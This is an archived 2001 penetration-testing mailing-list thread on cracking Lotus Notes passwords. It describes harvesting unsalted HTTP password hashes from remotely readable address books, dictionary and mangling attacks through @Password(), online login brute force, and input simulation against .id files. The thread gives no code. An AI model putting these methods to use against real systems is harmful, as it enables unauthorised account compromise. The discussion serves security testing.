Re: wanted: a script to try dictionary attacks against NOTES ID files

From: miguel.dilajat_private
Date: Wed Nov 21 2001 - 02:39:13 PST

Next message: Andy Miller: "RE: SQL"

Previous message: jjoreat_private: "Re: wanted: a script to try dictionary attacks against NOTES ID files"
Maybe in reply to: nobody: "wanted: a script to try dictionary attacks against NOTES ID files"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Talking of the HTTP password attack, it's easy to get the hash because the
NAB can be accessed remotely in MANY sites (bad administration), and the
hashes are not salted in 95+% of the installations (bad administration).
This way you can copy some hashes, but perhaps you don't have Notes to use
the @password() function to attack them. If one can program a C (or Perl)
code to attack, the attack can be done offline as well.
My past investigation didn't uncover info about any tools (except sesame)
to attack the hashing algorythm used, only that's RSA MD4, without salt by
default.
Also the dictionary attack against the hash using @password() wouldn't help
with many a password, you'll need mangling rules like Crack5 or John The
Ripper, or even pure bruteforce.
Best regards,

Miguel Dilaj





jjoreat_private on 20/11/2001 19:05:58

To:   pentest_list <pen-testat_private>
cc:
Subject:  Re: wanted: a script to try dictionary attacks against NOTES ID
      files


I'm responding to both messages at once.

The notes.id password is logically distinct from the HTTP password. That
said, many notes users set the same password in both places. The HTTP
password may be either salted or unsalted depending on whether the
administrators have configured the server that way.

There are two *easy* ways to attack a HTTP password. Throw a dictionary at
the @Password(string) function and compare this with the unsalted password
from the address book. Alternatively, run a dictionary against a httpd and
attempt to login that way. Obviously that will generate buckets of log
messages. I hear that there's a crypto-analysis attack on the
notes.id+httpd password but you'd have to be smarter than me to make it
work.

Cracking a .id would be nicer since that may be done offline. In the
absense of a regular scripted approach you could fake a machine out and
run something that simulates a user moving the mouse and typing at the
keyboard. While that'd be a pain and not particularly fast it'll be faster
to setup than doing the password checking via the Notes API.

Joshua b. Jore




----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Next message: Andy Miller: "RE: SQL"
Previous message: jjoreat_private: "Re: wanted: a script to try dictionary attacks against NOTES ID files"
Maybe in reply to: nobody: "wanted: a script to try dictionary attacks against NOTES ID files"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Nov 21 2001 - 09:40:40 PST